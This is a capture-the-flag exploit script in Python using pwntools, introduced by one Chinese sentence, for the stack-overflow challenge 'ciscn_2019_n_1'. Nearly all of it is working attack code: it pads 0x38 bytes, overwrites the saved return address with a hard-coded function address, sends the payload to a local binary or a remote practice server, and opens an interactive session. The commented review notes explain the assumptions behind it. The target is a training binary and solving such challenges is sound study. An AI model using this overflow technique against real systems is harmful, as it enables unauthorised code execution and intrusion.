基础的栈溢出:
溢出覆盖返回地址后,再跳转到程序中已有的函数调用,就可以获取权限。
from pwn import *
# Target profile for pwntools: 64-bit Linux, with verbose "debug" logging of
# the tube traffic.
context.update(os="linux", arch="amd64", log_level="debug")

# Mode switch read by main(): 1 runs the local binary, any other value
# connects to the remote service.
content = 0

# Parse the challenge binary (looked up relative to the working directory).
elf = ELF("ciscn_2019_n_1")

# PLT entry of system() and the first occurrence of the "cat /flag" bytes in
# the binary. Neither name is read again in the visible script, but both
# lookups raise if the symbol or the bytes are missing from the file.
system_plt = elf.plt["system"]
cat_flag = next(elf.search(b"cat /flag"))

# Hard-coded address that main() packs into the payload.
# NOTE(review): a fixed address only stays valid if the binary is not
# position-independent (no PIE) — confirm with checksec before relying on it.
addr = 0x4006BE
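def main():
    """Open a tube to the target, send the overflow payload, go interactive.

    The module-level ``content`` switch selects the target: 1 starts the
    local ``ciscn_2019_n_1`` binary, any other value connects to the remote
    host. The payload is filler followed by the module-level ``addr``.
    """
    if content == 1:
        tube = process('ciscn_2019_n_1')
    else:
        tube = remote("node3.buuoj.cn", 27031)

    # 0x30 + 8 filler bytes, then ``addr`` packed as an 8-byte value.
    # NOTE(review): presumably 0x30 is the distance from the buffer to the
    # saved rbp and the extra 8 bytes cover the saved rbp itself, so ``addr``
    # lands on the return address — confirm against the disassembly. A build
    # with a stack canary would abort before that address is ever used.
    payload = b'a' * (0x30 + 8) + p64(addr)

    # Tubes operate on bytes; passing a str makes pwntools on Python 3 emit a
    # BytesWarning and guess the encoding, so the prompt is given as bytes.
    tube.recvuntil(b"Let's guess the number.\n")
    tube.sendline(payload)

    # Hand stdin/stdout over to the user for the rest of the session.
    tube.interactive()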
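# Run only when executed as a script, so that importing this module does not
# start a process or open a network connection as a side effect.
if __name__ == "__main__":
    main()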